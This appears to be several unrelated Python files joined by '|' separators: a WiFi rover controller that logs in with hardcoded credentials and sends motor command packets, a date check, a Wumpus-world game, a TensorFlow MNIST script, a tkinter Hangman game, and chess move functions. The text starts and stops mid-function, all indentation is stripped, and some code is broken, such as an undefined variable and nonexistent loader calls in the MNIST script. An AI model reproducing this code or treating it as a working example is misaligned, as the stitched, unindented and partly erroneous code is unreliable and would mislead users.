except socket.error:
from sys import exit
exit()
def init_connection(self):
'''
Main file that initias connectio to a rover
'''
self.connect_rover()
# set up rover for communication
msg = ['GET /check_user.cgi?user=AC13&pwd=AC13 HTTP/1.1\r\nHost: ']
msg.append('192.168.1.100:80\r\n')
msg.append('User-Agent: WifiCar/1.0 CFNetwork/485.12.7 ')
msg.append('Darwin/10.4.0\r\nAccept: */*\r\nAccept-Language: ')
msg.append('en-us\r\nAccept-Encoding: gzip, deflate\r\n')
msg.append('Connection: keep-alive\r\n\r\n')
msg = ''.join(msg)
self.move_socket.send(msg)
# Get the return message
print ('Wait for HTML return msg')
data = ''
while len(data) == 0:
data = self.move_socket.recv(self.max_tcp_buffer)
print ('returned data', data)
# We have to close the socket and open it again
self.disconnect_rover()
self.connect_rover()
# send MO_O commands
for i in range(1, 4):
self.write_cmd(i)
print ('Wait for result on ' + str(i) + ' MO command')
data = ''
while len(data) == 0:
data = self.move_socket.recv(self.max_tcp_buffer)
print ('returned data', data)
# last data received is the image data
self.final_data = data
def connect_rover(self):
'''
Sets connection to the specified host and port
'''
try:
self.move_socket = \
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.move_socket.bind((self.nic, 0)) # bind to NIC
self.move_socket.connect((self.host, self.port))
self.move_socket.setblocking(1)
except socket.error:
print('Connection error. Make sure robot is on')
print('Exiting connection node...')
def disconnect_rover(self):
'''
Terminates main connection to rover
'''
self.move_socket.close()
def return_data(self):
'''
returns an ID necessary for the video socket
to initiate video socket connection with rover
'''
return self.final_data
def write_cmd(self, index):
'''
Us this function to sends commands to robot
(e.g., move tracks)
'''
# Robot's Control Packets
# The left brake command is
# 1 4d 4f 5f 4f fa 00 00 00 00 00 00 00 00 00 00 02
# 0010 00 00 00 01 00 00 00 02 00
# 02 was the byte that puts the left break
# and the right brake command is
# 0000 4d 4f 5f 4f fa 00 00 00 00 00 00 00 00 00 00 02
# 0010 00 00 00 01 00 00 00 04 00
# 04 was the byte that puts the left break
# Left Wheel forward
# 0000 4d 4f 5f 4f fa 00 00 00 00 00 00 00 00 00 00 02
# 0010 00 00 00 01 00 00 00 04 0a
# Right Wheel Forward
# 0000 4d 4f 5f 4f fa 00 00 00 00 00 00 00 00 00 00 02
# 0010 00 00 00 01 00 00 00 01 0a
# Left Wheel Backward
# 0000 4d 4f 5f 4f fa 00 00 00 00 00 00 00 00 00 00 02
# 0010 00 00 00 01 00 00 00 05 0a
# Right Wheel Backward
# 0000 4d 4f 5f 4f fa 00 00 00 00 00 00 00 00 00 00 02
# 0010 00 00 00 01 00 00 00 02 0a
# index is specifies which command to send
packet_len = 0
if index == 1:
packet_len = 22
elif index == 2:
packet_len = 48
elif index == 3:
packet_len = 23
elif index == 5:
packet_len = 24
elif index == 6:
packet_len = 24
elif index == 7:
packet_len = 24
elif index == 8:
packet_len = 24
elif index == 9:
packet_len = 22
elif index == 10:
packet_len = 23
elif index == 11:
packet_len = 23
elif index == 12:
packet_len = 24
elif index == 13:
packet_len = 24
cmd_buffer = array.array('c')
cmd_buffer.extend(['M', 'O', '_', 'O'])
for i in range(4, packet_len+1):
cmd_buffer.append('\0')
if index == 1:
cmd_buffer[4] = '\x02'
elif index == 2:
cmd_buffer[4] = '\x02'
cmd_buffer[15] = '\x1a'
cmd_buffer[23] = 'A'
cmd_buffer[24] = 'C'
cmd_buffer[25] = '1'
cmd_buffer[26] = '3'
cmd_buffer[36] = 'A'
cmd_buffer[37] = 'C'
cmd_buffer[38] = '1'
cmd_buffer[39] = '3'
elif index == 3:
cmd_buffer[4] = '\x04'
cmd_buffer[15] = '\x01'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x02'
elif index == 5: # left wheel Forward
cmd_buffer[4] = '\xfa'
cmd_buffer[15] = '\x02'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x04'
cmd_buffer[24] = '\x0a'
elif index == 6: # left wheel Backward
cmd_buffer[4] = '\xfa'
cmd_buffer[15] = '\x02'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x05'
cmd_buffer[24] = '\x0a'
elif index == 7: # right wheel Forward
cmd_buffer[4] = '\xfa'
cmd_buffer[15] = '\x02'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x01'
cmd_buffer[24] = '\x0a'
elif index == 8: # right wheel backward
cmd_buffer[4] = '\xfa'
cmd_buffer[15] = '\x02'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x02'
cmd_buffer[24] = '\x0a'
elif index == 9: # IR off(?)
cmd_buffer[4] = '\xff'
elif index == 10: # switches infrared LED on
cmd_buffer[4] = '\x0e'
cmd_buffer[15] = '\x01'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x5e'
elif index == 11: # switches infrared LED off
cmd_buffer[4] = '\x0e'
cmd_buffer[15] = '\x01'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x5f'
elif index == 12: # stop left track
cmd_buffer[4] = '\xfa'
cmd_buffer[15] = '\x02'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x02'
cmd_buffer[24] = '\x00'
elif index == 13: # stop right track
cmd_buffer[4] = '\xfa'
cmd_buffer[15] = '\x02'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x04'
cmd_buffer[24] = '\x00'
msg = cmd_buffer.tostring()
self.move_socket.send(msg)
# robot's speed is ~2 feet/second
# commands go as:
# self.write_cmd(left track)
# self.write_cmd(right track)
def move_forward(self):#distance, speed):
'''
Initiate move forward commands (moves both tracks)
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(5)
self.write_cmd(7)
# delta_time = time.time() - init_time
def move_backward(self):#distance, speed):
'''
Move robot backwards (moves both tracks)
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(6)
self.write_cmd(8)
# delta_time = time.time() - init_time
def turn_left(self):#distance, speed):
'''
Move robot backwards (moves both tracks)
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(6)
self.write_cmd(7)
# delta_time = time.time() - init_time
def turn_right(self):#distance, speed):
'''
Move robot backwards (moves both tracks)
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(5)
self.write_cmd(8)
# delta_time = time.time() - init_time
def move_left_forward(self):#distance, speed):
'''
Moves the left track only
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(7)
# delta_time = time.time() - init_time
def move_right_forward(self):#distance, speed):
'''
Moves the right track only
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(5)
# delta_time = time.time() - init_time
def move_left_backward(self):#distance, speed):
'''
Moves the left track only
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(8)
# delta_time = time.time() - init_time
def move_right_backward(self):#distance, speed):
'''
Moves the right track only
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(6)
# delta_time = time.time() - init_time
def stop_tracks(self):
'''
Stop tracks from moving
'''
self.write_cmd(12)
self.write_cmd(13)
def set_move(self, move_order):
'''
Tells robot where to move based on the published command
'''
if 'forward'+self._robot_id in move_order.data:
self.move_forward()
elif 'backward'+self._robot_id in move_order.data:
self.move_backward()
elif 'TuLef'+self._robot_id in move_order.data:
self.turn_left()
elif 'TuRi'+self._robot_id in move_order.data:
self.turn_right()
elif 'LefFor'+self._robot_id in move_order.data:
self.move_left_forward()
elif 'RiFor'+self._robot_id in move_order.data:
self.move_right_forward()
elif 'LefBa'+self._robot_id in move_order.data:
self.move_left_backward()
elif 'RiBa'+self._robot_id in move_order.data:
self.move_right_backward()
elif 'stop'+self._robot_id in move_order.data:
self.stop_tracks()
|
import datetime
def compare_time(time1, time2):
d1 = datetime.datetime.strptime(time1, '%Y-%m-%d %H:%M:%S')
d2 = datetime.datetime.strptime(time2, '%Y-%m-%d %H:%M:%S')
delta = d1 - d2
print("days is %s"%delta.days)
if delta.days >= 30:
return True
else:
return False
time1 = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
time2 = '2020-04-26 00:00:00'
compare_time(time1,time2)
|
import random, json, os
# We are assuming the following moves:
# Moves that change your orientation
# Up
# Down
# Left
# Right
# A move that changes your position
# Step
# The move that allows you to exit the board
# Exit
# Other actions that change the world aside from your position
# PickUp
# Shoot
# The function update will return a vector of strings that represent:
# (smell, air, glitter, bump, scream, location, orientation, status, score)
# The possible values are:
# Smell - clean|nasty
# Air - calm|breeze
# Glitter - bare|glitter
# Bump - no_bump|bump
# Scream - quiet|scream
# Location - unique identifier for current square
# Orientation - the direction you are facing
# Status - living|dead|won
# Score - current score
# You get precept vectors by calling take_action with the name of your world and the
# move you want to take.
def take_action(world_token,move):
world = get_world(world_token)
location = world["location"]
orientation = world["orientation"]
points = world["points"]
status = world["status"]
arrows = world["arrows"]
print "\n*********************************\n"
if status == "dead":
print "You are dead. Start a new game"
return
elif move == "Exit":
update = update_location(world, location, orientation)
if world["location"] != "Cell 11":
print "You need to get back to Cell 11 to exit"
elif world["points"] == 0:
print "You need to score some points in order to exit"
else:
update[7] = "won"
elif move == "Toss":
if world["rocks"] <= 0:
print "You are out of rocks"
return
else:
world["rocks"] = world["rocks"] - 1
print "Tossing a rock. You have " + str(world["rocks"]) + " left."
store_world(world_token,world)
cell_state = world[world[location][orientation]]
if cell_state["Pit"] is True:
return "Quiet"
else:
return "Clink"
elif move == "Step":
print "Taking a step"
new_location = world[location][orientation]
if new_location == "Void":
print "You bumped your head on the edge of the world."
update = update_location(world, location, orientation)
update[3] = "bump"
else:
print "Moving to " + str(new_location)
update = update_location(world, new_location, orientation)
world["location"] = new_location
elif move in["Up","Down","Left","Right"]:
print "Turing to face " + move
update = update_location(world, location, move)
world["orientation"] = move
elif move == "PickUp":
print "Trying to pick up gold"
if got_gold(world, location):
print "You've picked up some gold!"
print "You get 1000 more points!"
update = update_location(world, location, orientation)
update[2] = "bare"
world[location]["Gold"] = False
world["points"] = world["points"]+1000
else:
print "There is no gold here!"
update = update_location(world, location, orientation)
elif move == "Shoot":
print "Trying to shoot the Wumpus"
if world["arrows"] <= 0:
print "You are out of arrows"
elif wumpus_in_sight(world,location, orientation):
print "You killed the Wumpus!"
print "You get 100 more points!"
wumpus_location = where_is_the_Wumpus(world,location,orientation)
world[wumpus_location]["Wumpus"] = False
world["points"] = world["points"]+100
else:
print "You missed the Wumpus!"
update = update_location(world, location, orientation)
world["arrows"] = world["arrows"] - 1
print "Perception = (" + ", ".join(update) + ")"
world["status"] = update[7]
store_world(world_token,world)
update[8] = world["points"]
return update
# Update_location figures out the perceptual elements associated with a location by
# checking for gold, pits and the Wumpus
def update_location(world,location,orientation):
location_info = world[location]
baseline = ["clean","calm","bare","no_bump","quiet",location, orientation, "living", str(world["points"])]
if got_gold(world, location):
print "There is a lovely glitter in the room"
baseline[2] = "glitter"
if got_breeze(world, location):
print "There is a breeze running through this room"
baseline[1] = "breeze"
if got_smell(world, location):
print "There is a nasty smell in here"
baseline[0] = "nasty"
if location_info["Wumpus"] is True:
print "You got killed by the Wumpus and it was shockingly painful"
baseline[7] = "dead"
elif location_info["Pit"] is True:
print "You fell into a pit and died a slow and scary death"
baseline[7] = "dead"
return baseline
# Various tests to figure out precept list.
# Is there gold in this cell?
def got_gold(world, location):
return world[location]["Gold"]
# Do any of the adjacent cells have Pits in them?
def got_breeze(world,location):
for x in world[location]["Next"]:
if world[x]["Pit"]:
return True
return False
# Do any of the adjacent cells have the Wumpus?
def got_smell(world,location):
for x in world[location]["Next"]:
if world[x]["Wumpus"] is True:
return True
return False
# Is there are Wumpus in the agent's line of sight?
def wumpus_in_sight(world, location, orientation):
next_location = world[location][orientation]
if next_location == "Void":
return False
elif world[next_location]["Wumpus"] is True:
return True
else:
return wumpus_in_sight(world, next_location, orientation)
# Where is the Wumpus in the agent's line of sight?
def where_is_the_Wumpus(world, location, orientation):
next_location = world[location][orientation]
if world[location]["Wumpus"] is True:
return location
else:
return where_is_the_Wumpus(world, next_location, orientation)
# look_ahead
def look_ahead(world_token):
world = get_world(world_token)
return world[world["location"]]["Next"]
# Build out the dictionary that makes up the simple world that we have been looking at
def build_world(gold, wumpus, pits):
layout = {}
height = 4
width = 4
for x in range(1,width+1):
for y in range(1,height+1):
new_cell = {}
new_cell["Up"] = "Void"
new_cell["Down"] = "Void"
new_cell["Left"] = "Void"
new_cell["Right"] = "Void"
new_cell["Wumpus"] = False
new_cell["Pit"] = False
new_cell["Gold"] = False
new_cell["Next"] = []
if y < 4:
new_cell["Up"] = "Cell " + str(x) + str(y+1)
new_cell["Next"].append(new_cell["Up"])
if y > 1:
new_cell["Down"] = "Cell " + str(x) + str(y-1)
new_cell["Next"].append(new_cell["Down"])
if x < 4:
new_cell["Right"] = "Cell " + str(x+1) + str(y)
new_cell["Next"].append(new_cell["Right"])
if x > 1:
new_cell["Left"] = "Cell " + str(x-1) + str(y)
new_cell["Next"].append(new_cell["Left"])
layout["Cell "+str(x)+str(y)] = new_cell
layout[wumpus]["Wumpus"]=True
print "There is a Wumpus in cell " + wumpus + "."
layout[gold]["Gold"]=True
print "There is Gold in cell " + gold + "."
for cell in pits:
layout[cell]["Pit"]=True
print "There is a Pit in cell " + cell + "."
print
return layout
# In order to have a persistant world, we are going to store and update it as the
# game progresses.
# We first initialize the state of the world and return a random token to the user
# so that they can refer to the world that they are playing in
def intialize_world():
world_name = "Wumpus" + str(random.randint(0,10000))
print "\n*********************************\n"
print "Initializing your new Wumpus world!"
print "Your new world is called: "+ world_name
if not os.path.exists("WumpusWorldDataFolder"):
os.makedirs("WumpusWorldDataFolder")
world=build_world("Cell 32", "Cell 13", ["Cell 31","Cell 33","Cell 44"])
world["location"] = "Cell 11"
world["orientation"] = "Right"
world["status"] = "living"
world["points"] = 0
world["arrows"] = 1
world["rocks"] = 5
print "You are starting in Cell 11, looking to the Right."
print "You are starting with 0 points, " + str(world["arrows"]) + " arrow(s)."
print "You have " + str(world["rocks"]) + " rocks."
print "You are alive."
with open("WumpusWorldDataFolder/"+world_name+".json", 'w') as worldfile:
json.dump(world, worldfile)
worldfile.close()
return world_name
# In order to have a persistant world, we are going to store and update it as the
# game progresses.
# We first initialize the state of the world and return a random token to the user
# so that they can refer to the world that they are playing in
def intialize_my_world(gold,wumpus,pits):
world_name = "Wumpus" + str(random.randint(0,10000))
print "\n*********************************\n"
print "Initializing your own Wumpus world!"
print "Your new world is called: "+ world_name
if not os.path.exists("WumpusWorldDataFolder"):
os.makedirs("WumpusWorldDataFolder")
world=build_world(gold,wumpus,pits)
world["location"] = "Cell 11"
world["orientation"] = "Right"
world["status"] = "living"
world["points"] = 0
world["arrows"] = 1
world["rocks"] = 5
print "You are starting in Cell 11, looking to the Right."
print "You are starting with 0 points, " + str(world["arrows"]) + " arrow(s)."
print "You have " + str(world["rocks"]) + " rocks."
print "You are alive."
with open("WumpusWorldDataFolder/"+world_name+".json", 'w') as worldfile:
json.dump(world, worldfile)
worldfile.close()
return world_name
# At the beginning of each turn, we load the last state of the world so we know
# what precepts to return in response the actions.
def get_world(world_name):
with open("WumpusWorldDataFolder/"+world_name+".json") as worldfile:
world = json.load(worldfile)
worldfile.close()
return world
# As things change in response to actions, we update and store the world in response to
# actions that have been taken
def store_world(world_name,world):
with open("WumpusWorldDataFolder/"+world_name+".json", 'w') as worldfile:
json.dump(world, worldfile)
worldfile.close()
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
Created based on the following tutorial: http://ataspinar.com/2017/08/15/building-convolutional-neural-networks-with-tensorflow/
"""
#%% IMPORT NECESSARY PACKAGES
# To load the MNIST dataset you will need to install 'python-mnist'
# Install it with 'pip install python-mnist'
#pip install python-mnist
#pip install utils
import sys
sys.path.insert(0,'..')
import numpy as np
import tensorflow as tf
import mnist
#from cnn_models.lenet5 import *
#from cnn_models.lenet5_like import *
#from cnn_models.alexnet import *
#from cnn_models.vggnet16 import *
from utils import *
#import load_data as ld
from collections import defaultdict
from tensorflow.examples.tutorials.mnist import input_data
mndata = input_data.read_data_sets("MNIST data", one_hot=True)
#%% TEST CODE TO ENSURE TF IS WORKING AS INTENDED
hello = tf.constant('Hello, TensorFlow!')
sess = tf.Session()
print(sess.run(hello))
graph = tf.Graph()
with graph.as_default():
a = tf.Variable(8, tf.float32)
b = tf.Variable(tf.zeros([2,2], tf.float32))
with tf.Session(graph=graph) as session:
tf.global_variables_initializer().run()
print(session.run(a))
print(session.run(b))
#%% LOAD DATA
mnist_folder = 'C:/Users/nadolsw/Desktop/Tech/Data Science/Python/Ahmet/MNIST/'
mnist_image_width = 28
mnist_image_height = 28
mnist_image_depth = 1
mnist_num_labels = 10
#mndata = MNIST(mnist_folder)
mnist_train_dataset_, mnist_train_labels_ = mndata.load_training()
mnist_test_dataset_, mnist_test_labels_ = mndata.load_testing()
mnist_train_dataset, mnist_train_labels = reformat_data(mnist_train_dataset_, mnist_train_labels_, mnist_image_size, mnist_image_size, mnist_image_depth)
mnist_test_dataset, mnist_test_labels = reformat_data(mnist_test_dataset_, mnist_test_labels_, mnist_image_size, mnist_image_size, mnist_image_depth)
print("There are {} images, each of size {}".format(len(mnist_train_dataset), len(mnist_train_dataset[0])))
print("Meaning each image has the size of 28*28*1 = {}".format(mnist_image_size*mnist_image_size*1))
print("The training set contains the following {} labels: {}".format(len(np.unique(mnist_train_labels_)), np.unique(mnist_train_labels_)))
print('Training set shape', mnist_train_dataset.shape, mnist_train_labels.shape)
print('Test set shape', mnist_test_dataset.shape, mnist_test_labels.shape)
train_dataset_mnist, train_labels_mnist = mnist_train_dataset, mnist_train_labels
test_dataset_mnist, test_labels_mnist = mnist_test_dataset, mnist_test_labels
|
# -*- coding: utf-8 -*-
"""
Created on Thu May 6 13:07:33 2021
@author: Vidhi
"""
import random
from string import ascii_uppercase
from tkinter import messagebox
from tkinter import*
root = Tk()
root.title("Hangman")
root.iconbitmap("icon.ico")
root.geometry("670x580+300+70")
root.resizable(0,0)
root.config(bg="white")
def StartIsPressed():
def FruitIsPressed():
LLevel.destroy()
Fruit.destroy()
Sport.destroy()
Movie.destroy()
Countries.destroy()
Animal.destroy()
Brands.destroy()
Application.destroy()
word_list = ("APPLE", "AVOCADO", "BANANA", "BLACKBERRIES","MANGO", "APRICOT", "CANTALOUPE",
"ORANGE", "WATERMELON", "CARAMBOLA", "CUSTARDAPPLE", "POMEGRANATE","GUAVA",
"PEAR", "PLUM", "JACKFRUIT", "KIWI", "LYCHEE", "OLIVES", "PAPAYA", "RASPBERRIES", "PINEAPPLE")
photos = [PhotoImage(file="hang0.png"), PhotoImage(file="hang1.png"), PhotoImage(file="hang2.png"), PhotoImage(file="hang3.png"), PhotoImage(file="hang4.png"), PhotoImage(file="hang5.png"), PhotoImage(file="hang6.png"),
PhotoImage(file="hang7.png"), PhotoImage(file="hang8.png"), PhotoImage(file="hang9.png"), PhotoImage(file="hang10.png"), PhotoImage(file="hang11.png")]
def newGame():
global the_word_withSpaces
global numberOfGuesses
numberOfGuesses=0
imgLabel.config(image=photos[0])
the_word=random.choice(word_list)
the_word_withSpaces=" ".join(the_word)
lblWord.set(" ".join("_"*len(the_word)))
def guess(letter):
global numberOfGuesses
global guessed_letters
if numberOfGuesses<11:
txt=list(the_word_withSpaces)
guessed=list(lblWord.get())
print(guessed)
guessed_letters = []
for i in guessed:
if i.isalpha():
guessed_letters.append(i)
print(guessed_letters)
if the_word_withSpaces.count(letter)>0:
for c in range(len(txt)):
if txt[c]==letter:
guessed[c]=letter
lblWord.set("".join(guessed))
if lblWord.get()==the_word_withSpaces:
if numberOfGuesses <= 3:
messagebox.showinfo("Hangman","Your score is 3")
elif numberOfGuesses >3 and numberOfGuesses <=6:
messagebox.showinfo("Hangman","Your score is 2")
elif numberOfGuesses >6 and numberOfGuesses <=9:
messagebox.showinfo("Hangman","Your score is 1")
else:
messagebox.showinfo("Hangman","Your score is 0")
else:
numberOfGuesses+=1
imgLabel.config(image=photos[numberOfGuesses])
guessed=list(lblWord.get())
show_letter = random.choice(list(set(the_word_withSpaces).difference(guessed_letters)))
# show_letter = random.choice(list(the_word_withSpaces))
print(show_letter)
messagebox.showinfo("Hangman","Hint - One of the letter is %s " %(show_letter))
if numberOfGuesses==11:
messagebox.showwarning("Hangman","Game Over")
imgLabel=Label(root)
imgLabel.grid(row=0, column=0, columnspan=3)
imgLabel.config(image=photos[0])
lblWord=StringVar()
Label(root, textvariable=lblWord, font=("Times New Roman", 24, "bold")).grid(row=0, column=3, columnspan=6)
n=0
for c in ascii_uppercase:
Alphabet=Button(root, text=c, command=lambda c=c: guess(c), font=("Californian", 18, "bold"), width=4, justify="center")
Alphabet.grid(row=1+n//9, column=n%9)
n+=1
NewGame = Button(root, text="New\n Game", font=("Californian FB", 10, "bold"), command=lambda:newGame())
NewGame.grid(row=3, column=8, sticky="NSWE")
newGame()
def ApplicationIsPressed():
LLevel.destroy()
Fruit.destroy()
Sport.destroy()
Movie.destroy()
Countries.destroy()
Animal.destroy()
Brands.destroy()
Application.destroy()
word_list = ("FACEBOOK", "INSTAGRAM", "SNAPCHAT", "FLIPKART", "AMAZON", "FREE FIRE",
"MYNTRA", "WHATSAPP", "ZOOM", "YOUTUBE", "UBER")
app_hints = {
'FACEBOOK': 'Maximum fake account',
'INSTAGRAM': 'known as a step brother of Facebook',
'SNAPCHAT': 'ghost logo',
'FLIPKART': 'fashion sale',
'AMAZON': 'the name related to the world largest river',
'FREE FIRE': 'battle royale game',
'MYNTRA' : 'Indian fashion eCommerce company',
'WHATSAPP' : 'commonly used by everyone',
'ZOOM' : 'hated by student during pandemic',
'YOUTUBE' : 'online video platform owned by Google',
'UBER' : 'transport application'
}
photos = [PhotoImage(file="hang0.png"), PhotoImage(file="hang1.png"), PhotoImage(file="hang2.png"), PhotoImage(file="hang3.png"), PhotoImage(file="hang4.png"), PhotoImage(file="hang5.png"), PhotoImage(file="hang6.png"),
PhotoImage(file="hang7.png"), PhotoImage(file="hang8.png"), PhotoImage(file="hang9.png"), PhotoImage(file="hang10.png"), PhotoImage(file="hang11.png")]
def newGame():
global the_word_withSpaces
global numberOfGuesses
numberOfGuesses=0
imgLabel.config(image=photos[0])
the_word=random.choice(word_list)
the_word_withSpaces=" ".join(the_word)
lblWord.set(" ".join("_"*len(the_word)))
def guess(letter):
global numberOfGuesses
global guessed_letters
if numberOfGuesses<11:
txt=list(the_word_withSpaces)
print(txt)
guessed=list(lblWord.get())
print(guessed)
guessed_letters = []
for i in guessed:
if i.isalpha():
guessed_letters.append(i)
print(guessed_letters)
if the_word_withSpaces.count(letter)>0:
for c in range(len(txt)):
if txt[c]==letter:
guessed[c]=letter
lblWord.set("".join(guessed))
if lblWord.get()==the_word_withSpaces:
if numberOfGuesses <= 3:
messagebox.showinfo("Hangman","Your score is 3")
elif numberOfGuesses >3 and numberOfGuesses <=6:
messagebox.showinfo("Hangman","Your score is 2")
elif numberOfGuesses >6 and numberOfGuesses <=9:
messagebox.showinfo("Hangman","Your score is 1")
else:
messagebox.showinfo("Hangman","Your score is 0")
else:
numberOfGuesses+=1
imgLabel.config(image=photos[numberOfGuesses])
# txt = list(the_word_withSpaces)
# print(txt)
# print(the_word_withSpaces)
# print(type(the_word_withSpaces))
# print(txt)
# print(type(txt))
new_word = the_word_withSpaces.replace(" ", "")
print(new_word)
show_letter = app_hints[new_word]
# guessed=list(lblWord.get())
# show_letter = random.choice(list(set(the_word_withSpaces).difference(guessed_letters)))
# show_letter = random.choice(list(the_word_withSpaces))
print(show_letter)
messagebox.showinfo("Hangman","Hint - %s" %(show_letter))
if numberOfGuesses==11:
messagebox.showwarning("Hangman","Game Over")
imgLabel=Label(root)
imgLabel.grid(row=0, column=0, columnspan=3)
imgLabel.config(image=photos[0])
lblWord=StringVar()
Label(root, textvariable=lblWord, font=("Times New Roman", 24, "bold")).grid(row=0, column=3, columnspan=6)
n=0
for c in ascii_uppercase:
Alphabet=Button(root, text=c, command=lambda c=c: guess(c), font=("Californian", 18, "bold"), width=4, justify="center")
Alphabet.grid(row=1+n//9, column=n%9)
n+=1
NewGame = Button(root, text="New\n Game", font=("Californian FB", 10, "bold"), command=lambda:newGame())
NewGame.grid(row=3, column=8, sticky="NSWE")
newGame()
heading.destroy()
LPhoto.destroy()
StartButton.destroy()
LLevel = Label(root, text="Select Categories!!", font=("Californian FB", 35, "bold"), bg="white")
LLevel.place(x=158, y=45)
Fruit = Button(root, text="Fruit", font=("Californian FB", 15, "bold"), bg="blue", fg="white", padx=70, pady=5, justify="center", cursor="hand2", command=FruitIsPressed)
Fruit.place(x=240, y=120)
Sport = Button(root, text="Sport", font=("Californian FB", 15, "bold"), bg="blue", fg="white", padx=68, pady=5, justify="center", cursor="hand2",)#command=SportIsPressed
Sport.place(x=240, y=180)
Movie = Button(root, text="Movie", font=("Californian FB", 15, "bold"), bg="blue", fg="white", padx=66, pady=5, justify="center", cursor="hand2",)#command=MovieIsPressed
Movie.place(x=240, y=240)
Countries = Button(root, text="Countries", font=("Californian FB", 15, "bold"), bg="blue", fg="white", padx=52, pady=5, justify="center", cursor="hand2",)#command=CountriesIsPressed
Countries.place(x=240, y=300)
Animal = Button(root, text="Animal", font=("Californian FB", 15, "bold"), bg="blue", fg="white", padx=66, pady=5, justify="center", cursor="hand2",)#command=AnimalIsPressed
Animal.place(x=240, y=360)
Brands = Button(root, text="Brands", font=("Californian FB", 15, "bold"), bg="blue", fg="white", padx=67, pady=5, justify="center", cursor="hand2",)#command=BrandsIsPressed
Brands.place(x=240, y=420)
Application = Button(root, text="Application", font=("Californian FB", 15, "bold"), bg="blue", fg="white", padx=49, pady=5, justify="center", cursor="hand2", command= ApplicationIsPressed)#command=ApplicationIsPressed
Application.place(x=240, y=480)
heading = Label(root, text="Welcome to Hangman!!", font=("Times New Roman", 40, "bold"), fg="white", bg="black", relief=GROOVE, border=10)
heading.pack(side=TOP, fill=X)
photo = PhotoImage(file="hangman1.png")
LPhoto = Label(root, image=photo, bg="white")
LPhoto.pack()
start = PhotoImage(file="start.png")
StartButton = Button(root, image=start, relief=FLAT, border=0, bg="white", cursor="hand2", command=StartIsPressed)
StartButton.place(x=250, y=490)
root.mainloop()
|
def getPawnMoves(pos, board, colour, moveNo):
possibleMoves = []
standard = [-1,0]
ifOccupied = [[-1,-1], [-1,1]]
ifFirst = [-2,0]
if colour == "black":
standard[0] *= -1
ifOccupied[0][0] *= -1
ifOccupied[1][0] *= -1
ifFirst[0] *= -1
if pos[0] + standard[0] <= 7:
if board[pos[0] + standard[0]][pos[1]] == None:
possibleMoves.append([pos[0] + standard[0], pos[1]])
for move in ifOccupied:
proposedMove = [pos[0] + move[0], pos[1] + move[1]]
if proposedMove[0] <= 7 and proposedMove[0] >= 0 and proposedMove[1] <= 7 and proposedMove[1] >= 0:
if board[proposedMove[0]][proposedMove[1]] != None:
if board[proposedMove[0]][proposedMove[1]].colour != colour:
possibleMoves.append(proposedMove)
if moveNo == 0:
possibleMoves.append([pos[0] + ifFirst[0], pos[1] + ifFirst[1]])
return possibleMoves
def getRookMoves(pos, board, colour):
possibleMoves = []
superSearching = True
searching1 = True
searching2 = True
searching3 = True
searching4 = True
count = 1
while superSearching:
if not searching1 and not searching2 and not searching3 and not searching4:
superSearching = False
else:
if searching1:
if pos[0] - count < 0:
searching1 = False
else:
if board[pos[0] - count][pos[1]] == None:
possibleMoves.append([pos[0] - count, pos[1]])
else:
if board[pos[0] - count][pos[1]].colour != colour:
possibleMoves.append([pos[0] - count, pos[1]])
searching1 = False
if searching2:
if pos[1] + count > 7:
searching2 = False
else:
if board[pos[0]][pos[1] + count] == None:
possibleMoves.append([pos[0], pos[1] + count])
else:
if board[pos[0]][pos[1] + count].colour != colour:
possibleMoves.append([pos[0], pos[1] + count])
searching2 = False
if searching3:
if pos[0] + count > 7:
searching3 = False
else:
if board[pos[0] + count][pos[1]] == None:
possibleMoves.append([pos[0] + count, pos[1]])
else:
if board[pos[0] + count][pos[1]].colour != colour:
possibleMoves.append([pos[0] + count, pos[1]])
searching3 = False
if searching4:
if pos[1] - count < 0:
searching4 = False
else:
if board[pos[0]][pos[1] - count] == None:
possibleMoves.append([pos[0], pos[1] - count])
else:
if board[pos[0]][pos[1] - count].colour != colour:
possibleMoves.append([pos[0], pos[1] - count])
searching4 = False
count += 1
return possibleMoves
def getBishopMoves(pos, board, colour):
possibleMoves = []
superSearching = True
searching1 = True
searching2 = True
searching3 = True
searching4 = True
count = 1
while superSearching:
if not searching1 and not searching2 and not searching3 and not searching4:
superSearching = False
else:
if searching1:
if pos[0] - count < 0 or pos[1] - count < 0:
searching1 = False
else:
if board[pos[0] - count][pos[1] - count] == None:
possibleMoves.append([pos[0] - count, pos[1] - count])
else:
if board[pos[0] - count][pos[1] - count].colour != colour:
possibleMoves.append([pos[0] - count, pos[1] - count])
searching1 = False
if searching2:
if pos[0] - count < 0 or pos[1] + count > 7:
searching2 = False
else:
if board[pos[0] - count][pos[1] + count] == None:
possibleMoves.append([pos[0] - count, pos[1] + count])
else:
if board[pos[0] - count][pos[1] + count].colour != colour:
possibleMoves.append([pos[0] - count, pos[1] + count])
